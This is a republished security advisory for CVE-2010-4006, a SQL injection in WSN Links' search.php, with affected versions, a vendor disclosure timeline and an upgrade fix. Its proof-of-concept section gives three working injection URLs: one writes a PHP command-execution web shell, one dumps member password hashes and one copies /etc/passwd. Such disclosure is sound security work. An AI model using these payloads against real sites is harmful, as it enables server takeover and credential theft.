Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25040
HistoryNov 02, 2010 - 12:00 a.m.

'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)

2010-11-0200:00:00
vulners.com
34
JSON

'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)
Mark Stanislav - [email protected]

I. DESCRIPTION

A vulnerability exists in the search.php code that allows for SQL injection of
various parameters. By assembling portions of SQL code between the affected
parameters, successful SQL injection into the software can occur. In the testing
done, various 'UNION SELECT' SQL injections can occur.

II. AFFECTED VERSIONS

< 6.0.1; < 5.1.51 ; < 5.0.81

III. TESTED VERSIONS

5.1.40 & 5.1.49

IV. PoC EXPLOITS

1) A 'UNION SELECT' which results in a PHP shell-execution script
http://example.com/search.php?namecondition=IS&#37;20NULL&#41;&#41;&#37;20UNION&#37;20&#40;&#40;SELECT&#37;20&quot;&lt;?php&#37;20system&#40;$_REQUEST[cmd]&#41;;&#37;20?&gt;&quot;&#37;20INTO&#37;20OUTFILE&amp;namesearch=/var/www/exec.php&amp;action=filter&amp;filled=1&amp;whichtype=categories

2) A 'UNION SELECT' which results in a member's name, password hash, and e-mail
to be extracted to a file
http://example.com/search.php?namecondition=IS&#37;20NOT&#37;20NULL&#41;&#41;&#37;20UNION&#37;20&#40;&#40;SELECT&#37;20concat&#40;name,0x3a,password,0x3a,email&#41;&#37;20FROM&#37;20wsnlinks_members&#37;20INTO&#37;20OUTFILE&amp;namesearch=/var/www/pass.txt&amp;action=filter&amp;filled=1&amp;whichtype=categories

3) A 'UNION SELECT' which results in the /etc/passwd file being copied to a web
directory file
http://example.com/search.php?namecondition=IS&#37;20NOT&#37;20NULL&#41;&#41;&#37;20UNION&#37;20&#40;&#40;SELECT&#37;20load_file&#40;0x2f6574632f706173737764&#41;&#37;20INTO&#37;20OUTFILE&amp;namesearch=/var/www/passwd.txt&amp;action=filter&amp;filled=1&amp;whichtype=categories

V. NOTES

  • The above exploits require 'FILE' SQL privilege as well as poor web directory
    permissions to work.
  • Only 'namecondition' and 'namesearch' are utilized for the actual SQL injection.
  • There is potential to exploit this vulnerability which outputs user data
    directly to the browser.
  • Passing 'debug=1' as a query value easily enables debug mode of tested 'WSN
    Links' deployments.

VI. SOLUTION

Upgrade to the most recent version of your 'WSN Links' code branch.

VII. REFERENCES

http://www.wsnlinks.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4006
http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/

VIII. TIMELINE

10/10/2010: Initial discloure e-mail to the vendor
10/18/2010: Follow-up via the vendor's contact web form
10/18/2010: Vendor acknowledgement/commitment to fix
10/21/2010: Patched versions released
10/31/2010: Public disclosure

Related

exploitpack 1
packetstorm 1
cve 1
prion 1
seebug 1
myhack58 1
exploitdb 1
securityvulns 1
exploitpack
exploitpack
WSN Links - SQL Injection
2010-11-24 00:00:00
packetstorm
packetstorm
WSN Links SQL Injection
2010-11-02 00:00:00
cve
cve
CVE-2010-4006
2010-11-03 20:00:00
prion
prion
Sql injection
2010-11-03 20:00:00
seebug
seebug
WSN Links SQL Injection Vulnerability
2014-07-01 00:00:00
myhack58
myhack58
WSN Links SQL injection vulnerability-vulnerability warning-the black bar safety net
2010-11-26 00:00:00
exploitdb
exploitdb
WSN Links - SQL Injection
2010-11-24 00:00:00
securityvulns
securityvulns
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2010-11-02 00:00:00
JSON
Related for SECURITYVULNS:DOC:25040
exploitpack1packetstorm1cve1prion1seebug1myhack581exploitdb1securityvulns1